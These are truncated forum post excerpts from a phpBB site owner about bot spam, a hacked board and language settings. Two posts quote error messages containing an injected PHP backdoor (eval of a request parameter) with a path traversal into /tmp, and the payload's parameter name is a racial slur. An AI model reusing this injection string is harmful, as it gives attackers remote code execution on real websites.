I made the changes in MySql. I understand that it won't permanently stop bots. My guess is it will slow them down in my case. They target one particular topic and spam it. I changed the topic number. So now they have to go back with the bot to do more work. Its an easy command for me to implement in...
I found that bots are targeting a specific topic and are spamming. If I change the topic number they will stop (for now). This is the T# that the database assigns to new topics. In The MYSQL tables.... what tables do I change and what fields? Example: I want to change topic #18 to #999 (not used).
Found it: Look here: http://www.phpbb.com/phpBB/viewtopic.php?t=272959 and here: http://www.phpbb.com/phpBB/viewtopic.php?t=328542&highlight=nigga You need to do 2 things: 1 - Go into the MYSQL database 2 - Type: select * from phpbb_themes; 3 - You will see the ../../../../../../../../ theme tha...
That's for a virus and a trojan horse. All the posts are about using the admin panel to find things. I can't even access my admin. I keep getting the same error on any page you want to view: ---------------- phpBB : Critical Error Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// ...
OK.. Now I'm back to the hacker script: ---------------------- phpBB : Critical Error Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file DEBUG MODE Line : 361 File : functions.php -------------------...
I had a hacker with the 'nigga' script that stopped the database. My site is http://mb.idate2005.com I am using PHP4 and MYSQL I backed up the database (ver 2.0.15). I uploaded the FULL VERSION of 2.0.17. I restored the datbase using the command: mysql -u USERNAME -p DATABASENAME < /PATH/TO/SAVEDFIL...
I have a website in several languages. For each language, I have a menu option for "message board." Anyone clicking on it will go to the message board index.php page. The default language for that page is English. How do I set it so that someone who links from the German page gets German a...